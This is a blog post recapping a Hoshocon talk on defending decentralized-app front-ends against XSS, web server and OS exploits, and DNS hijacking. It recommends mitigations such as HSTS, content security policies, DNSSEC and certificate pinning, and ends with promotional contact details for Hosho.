Last week we had the pleasure of attending a cybersecurity & blockchain conference hosted by Hosho called Hoshocon. What is Hosho? It is a smart contract auditing company which offers a variety of services focused on protecting your decentralized applications ( dapp ). Interesting fact about the word HOSHO, it actually means a “Sense of Security” in Japanese. As you can tell, Hosho is super focused on security within the blockchain ecosystem, an important aspect since we’ve seen so many hacks recently within exchanges & dapps. So how do you protect your dapps from being compromised? Jay Schwerberg, Director of Engineering at Hosho shared his insights. Mr. Schwerberg is a seasoned cybersecurity veteran with extensive experience in the lotto & gaming industry.
Security is focused on Smart Contracts, but what about your front-end / web-app?
The truth is most companies are heavily focused on securing their smart contracts. However, it is important to also consider securing your front-end or web-app, which communicates with your smart contracts & back-end. Let’s take a look at some of the hidden points of attack that Mr. Schwerberg highlighted during his presentation.
Hidden Points of Attack
We’ll cover the following areas that have been exploited in the past and could have been avoided by a few simple updates. It is important to remember that your front-end has no direct communication with your dApp backend.
- XSS ( Cross-site scripting ) Attacks
- Web Server Exploits
- OS Exploits
- DNS Hijacking
What are Cross-site Scripting (XSS) Attacks & How To Prevent Them
As defined by OWASP, Cross-Site Scripting ( XSS ) attacks are a type of injection, where malicious scripts are injected into trusted & harmless websites. These can be quite common where a web-application accepts input from a user without validating or encoding it.
Protecting Against XSS Attacks
Luckily, developers have access to a variety of useful information on the web that can help guide them in securing their decentralized applications. Here are some tips to help you protect your dapp.
- Deny All on all untrusted data
- Sanitizing User Input
- Implement Content Security & Cross-origin Resource Sharing
- Use Strong TLS Security
To read more about the available prevention methods for XSS attacks, check out this useful resource by OWASP. XSS ( Cross Site Scripting ) Prevention Cheatsheet
Taking a Look Into Web Server Exploits & Operating System Exploits
One of the most common web server exploits we’ve seen over the years is the Denial of Service Attack. However, there are a few more exploits we’ll have to consider.
- Directory Traversal
- Misconfiguration Attacks
This is a vulnerability where an attacker is able to access beyond the web root directory from the application. If they are able to access beyond the web root directory, they might execute OS (Operating System) commands and get sensitive information or access restricted directories.
If unnecessary services are enabled or default configuration files are used, verbose/error information is not masked; an attacker can compromise the web server through various attacks like password cracking, Error-based SQL injection, Command Injection, etc.
An attacker may redirect the victim to malicious websites by sending him/her a malicious link by email which looks authentic, but redirects him/her to malicious web page thereby stealing their data.
Protecting Against DNS Hijacking or What MyEtherWallet Could Have Done to Prevent The Hack
As we saw earlier in the year, the popular Ethereum wallet known as MyEtherWallet was compromised by using a DNS Hijacking attack. Attackers took over the domain which then began serving malicious code to unsuspecting users. According to Jay Schwerberg, this costly attack could have been avoided by using a few simple updates. Here’s what Mr. Schwerberg recommended:
- DNS Security Extensions
- Certificate Pinning
- HSTS ( HTTP Strict Transport Security )
- Content Security
What is HTTP Strict Transport Security ( HSTS )?
The best definition of HSTS is provided by GlobalSign, an SSL & Digital Certificate provider which specializes in protecting your websites at the domain level.
HTTP Strict Transport Security (HSTS) is a web server directive that informs user agents and web browsers how to handle its connection through a response header sent at the very beginning and back to the browser. This sets the Strict-Transport-Security policy field parameter. It forces those connections over HTTPS encryption, disregarding any script’s call to load any resource in that domain over HTTP. HSTS is but one arrow in a bundled sheaf of security settings for your web server or your web hosting service. GlobalSign – https://www.globalsign.com/en/blog/what-is-hsts-and-how-do-i-use-it/
Final Thoughts on dApp Protection
From XSS Attacks to DNS Hijacking, there is a lot to consider when securing your decentralized applications. Security is a very important pillar in software development, but often gets overlooked due to deadlines and requirements from upper management. There are great resources out there to help you protect your dapp from being compromised, but if you would like a professional opinion on your security implementatiion, feel free to contact Hosho or Jay Schwerberg directly. Contact information will be included below.
Is there anything we missed? Let us know in the comments below. We’d love to hear about how you’re protecting your dApps from unwanted intruders.
HOSHO ( Smart Contract Auditing & Blockchain Security Services ) – https://hosho.io/contact
Jay Schwerberg – Director of Engineering | Hosho Twitter: @jschwerberg Email: firstname.lastname@example.org
Disclaimer: CryptoCanucks.com is not intended to provide tax, legal or investment advice, and nothing on CryptoCanucks.com should be construed as an offer to sell, a solicitation of an offer to buy, or a recommendation for any asset by CryptoCanucks.com or any third party. You alone are solely responsible for determining whether any investment, asset or strategy, or any other product or service, is appropriate or suitable for you based on your investment objectives and personal and financial situation. You should consult an attorney or tax professional regarding your specific legal or tax situation.